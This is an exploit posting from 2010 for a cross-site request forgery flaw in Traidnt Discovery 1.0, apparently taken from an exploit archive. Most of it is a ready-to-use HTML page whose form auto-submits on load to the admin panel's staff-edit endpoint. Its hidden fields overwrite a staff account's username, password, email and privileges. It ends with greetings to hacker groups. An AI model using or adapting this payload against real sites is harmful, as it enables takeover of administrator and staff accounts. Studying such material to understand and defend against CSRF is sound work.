traidntdiscovery-xsrf.txt
Posted on 17 June 2010
# Exploit Title: Traidnt Discovery - [CSRF/Change Username & Password] Staff Account # Date: 16-06-2010 # Author: G0D-F4Th3r # Software Link: http://discovery.traidnt.com/demo/ # Version: 1.0 ====================================[form]================================================ <html> <form name="r00t" action=" http://www.site.com/[path]/admincp/staff.php?do=edit&id=1&go=update" method="POST"> <body onload="document.forms.r00t.submit();"> <input type="hidden" name="username" value="staff-username"/> <input type="hidden" name="password" value="staff-password"/> <input type="hidden" name="email" value="mail@mail.com"/> <input type="hidden" name="realname" value="Discovery"/> <input type="hidden" name="sig" value="discovery ..."/> <input type="hidden" name="viewsig" value="1"/> <input type="hidden" name="receivemsg" value="1"/> <input type="hidden" name="cat_array[]" value="1"/> <input type="hidden" name="cat_array[]" value="3"/> <input type="hidden" name="cat_array[]" value="2"/> <input type="hidden" name="viewserver" value="1"/> <input type="hidden" name="viewonline" value="1"/> <input type="hidden" name="sendmsg" value="1"/> <input type="hidden" name="accessbill" value="1"/> <input type="hidden" name="editcard" value="1"/> <input type="hidden" name="editcomm" value="1"/> <input type="hidden" name="service" value="1"/> <input type="hidden" name="olduser" value="staff-username"/> </form> </body> </html> ==================================== Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends
